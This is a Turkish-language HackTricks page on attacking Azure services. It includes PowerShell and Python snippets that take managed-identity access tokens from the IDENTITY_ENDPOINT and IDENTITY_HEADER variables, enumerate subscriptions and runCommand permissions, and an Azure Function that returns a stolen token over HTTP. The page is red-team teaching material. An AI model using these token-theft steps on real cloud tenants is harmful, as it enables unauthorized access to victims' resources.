Az - Services

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Portal

Microsoft portal listesini https://msportals.io/ adresinde bulabilirsiniz.

Ham istekler

Powershell ile Azure API'si

IDENTITY_HEADER ve IDENTITY_ENDPOINT üzerinden access_token alın: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

Ardından Azure REST API'sini sorgulayarak abonelik ID'si ve daha fazlasını alın.

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

Azure API Python Sürümü

Bu bölümde, Azure API'lerine Python kullanarak nasıl erişileceğini öğreneceksiniz. Azure API'lerini kullanarak Azure hizmetlerine programatik olarak erişebilir ve yönetebilirsiniz.

Azure API'lerine erişmek için Azure SDK'sını kullanabilirsiniz. Azure SDK'sı, Azure hizmetlerine erişmek için kullanılan Python kütüphanelerini içerir. Azure SDK'sını yüklemek için aşağıdaki adımları izleyin:

  1. Azure SDK'yı yüklemek için aşağıdaki komutu çalıştırın:

pip install azure
  1. Azure SDK'yı projenize dahil etmek için aşağıdaki kodu kullanın:

from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient

# Azure kimlik bilgilerini ayarlayın
subscription_id = 'your-subscription-id'
tenant_id = 'your-tenant-id'
client_id = 'your-client-id'
client_secret = 'your-client-secret'

# Kimlik bilgileriyle oturum açın
credentials = ServicePrincipalCredentials(
    client_id=client_id,
    secret=client_secret,
    tenant=tenant_id
)

# Azure API'lerine erişmek için bir istemci oluşturun
resource_client = ResourceManagementClient(credentials, subscription_id)

Yukarıdaki kod örneğinde, Azure kimlik bilgilerinizi ve abonelik kimliğinizi belirtmeniz gerekmektedir. Bu bilgileri Azure Portal'dan veya Azure CLI aracılığıyla alabilirsiniz.

Azure API'lerine Python kullanarak erişmek için bu örnek kodu kullanabilirsiniz. Bu örnek, Azure kaynak yönetimi API'sine erişmek için kullanılan bir istemci oluşturur.

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

veya bir Python Fonksiyonu içinde:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

Hizmet Listesi

Bu bölümün sayfaları Azure hizmetine göre sıralanmıştır. Burada her hizmet hakkında bilgi bulabilirsiniz (nasıl çalıştığı ve yetenekleri) ve ayrıca her hizmetin nasıl numaralandırılacağını öğrenebilirsiniz.

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Last updated